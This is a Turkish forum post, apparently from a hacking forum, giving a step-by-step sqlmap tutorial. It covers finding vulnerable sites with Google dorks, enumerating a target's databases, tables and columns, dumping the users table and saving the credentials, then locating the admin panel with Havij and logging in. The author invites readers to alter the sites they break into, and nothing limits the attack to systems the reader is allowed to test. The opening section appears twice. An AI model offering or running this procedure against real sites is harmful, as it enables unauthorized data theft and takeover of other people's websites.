Merhaba dostlarım, bugün size kali linux için SQLMAP kullanımını detaylı bir şekilde anlatacağım.
Sitedeki sqlmap kullanımıı açıklamaları beni tatmin etmedi bende bir tane kendim hazırladım. iyi okumalar.
ÖNEMLİ* Arkadaşlar önce bilmemiz gereken bazı komutlar var.
dbs= Açılımı Database demektir. Database, birbirleriyle ilişkisi bulunan bilgilerin saklandığı ya da depolandığı alanın tümüne verilen isimdir.
-u = url demektir. örnek= sqlmap -u " sqlmap -u http:/ /hedefsite. comm/ .php?cat=1" --random-agent --dbs
-g = googledork demektir. googleda bu dorkla arama yapar ve açık potansiyeli yüksek siteleri size sunar. örnek= sqlmap -g "index.php?id="
dork= Genellikle Sql açıklı siteler bulmamıza yarayan bir koddur.
Google Dork = Yaptığımız aramaları daha kaliteli ve istediğimiz sonuca daha hızlı ulaşmamızı sağlayan komutlardır. Örneğin bir isim, şifre, zafiyet, müzik, resim arıyorsunuz ve bulamıyorsanız o anda devreye Google dorkları girer. örnek= "index.php?id="Sitedeki sqlmap kullanımıı açıklamaları beni tatmin etmedi bende bir tane kendim hazırladım. iyi okumalar.
ÖNEMLİ* Arkadaşlar önce bilmemiz gereken bazı komutlar var.
dbs= Açılımı Database demektir. Database, birbirleriyle ilişkisi bulunan bilgilerin saklandığı ya da depolandığı alanın tümüne verilen isimdir.
-u = url demektir. örnek= sqlmap -u " sqlmap -u http:/ /hedefsite. comm/ .php?cat=1" --random-agent --dbs
-g = googledork demektir. googleda bu dorkla arama yapar ve açık potansiyeli yüksek siteleri size sunar. örnek= sqlmap -g "index.php?id="
dork= Genellikle Sql açıklı siteler bulmamıza yarayan bir koddur.
--random-agent = Rastgele HTTP User-Agent başlık bilgisi kullanmak için kullanılır.
-tables = size dbs içindeki tabloları getirir.
-columns = size tablo içindeki kolonları getirir.
-dump = verileri çeker ve size gösterir
admin paneli = Sitede değişiklik yapmaya, ürün ve hizmet eklemeye imkan veren yönetim paneli, bütün sitenin yönetilmesini sağlayan bir alandır.
1-) Terminalimizi açıyoruz. (burası en zor kısım gerisi aşırı basit bana güvenin.)
2-) Terminalimize sqlmap -u komutunu yazıyoruz ve çalıştırıyoruz.
3-) Terminalimize sqlmap -u "http: //hedefsite. cow/ php?id=31" --random-agent --dbs yazıyoruz ve çalıştırıyoruz. (Gelen sorulara Y tuşuna basarak enterleyin.)
4-) Bize bir veri tabanı verdi. Burdaki information_schema işimize yaramaz. her web sitesinde bulunur.
5-) Asıl işlem burda başlıyor. sondaki --dbs kısmını şu şekilde düzeltiyoruz -D ve
sonuna -tables ekliyoruz sqlmap -u "http:/ / hedefsite. com/php?id=31" --random-agent -D -tables sonra çalıştırıyoruz.
6-) Tablolar önümüze geldi..
7-) Sondaki -tables komutunu -T olarak değiştiriyoruz. işimize yarayacak tablolar: admin-users-login... "bende users var o yüzden users yazıyorum. sizde ne varsa onu ekleyin" ve sona -columns komutunu ekliyoruz. çalıştırıyoruz.
sqlmap -u "]ht tp: //hedefsite. com/php?id=31" --random-agent -D -T users -columns
kolonları önümüze geldi. Tam işimize yarayacak şeyler..
9-) sondaki -columns komutunu siliyoruz ve yerine --dump komutunu ekliyoruz ve çalıştırıyoruz.
sqlmap -u "http ://hedefsite .com/php?id=31" --random-agent -D -T users --dump
10-) Evet! veriler önümüze geldi. Bunları not defterine kayıt ediyoruz.
11-) Sırada admin paneli bulma var. Bu işlemi havij ile yapacağız. find admin kısmına gelip; http:// hedefsite. com/php?id =31 url'sini .com/ a kadar siliyoruz yani http ://hedefsite . com/ şeklinde olacak. Start diyoruz.
12-) Admin paneline gidiyoruz ancak benim sitem bir test sitesi olduğu için sitede değişiklik yapamıyorum ama siz yapabilirsiniz.
13-) Şimdi sıra bilgileri görmeye geldi. Kaydettiğimiz bilgilerle dolduruyoruz sayfayı ve giriş yapıyoruz..
İşlemlerimiz bu kadardı. Umarım işinize yarar iyi forumlar.
Son düzenleme:
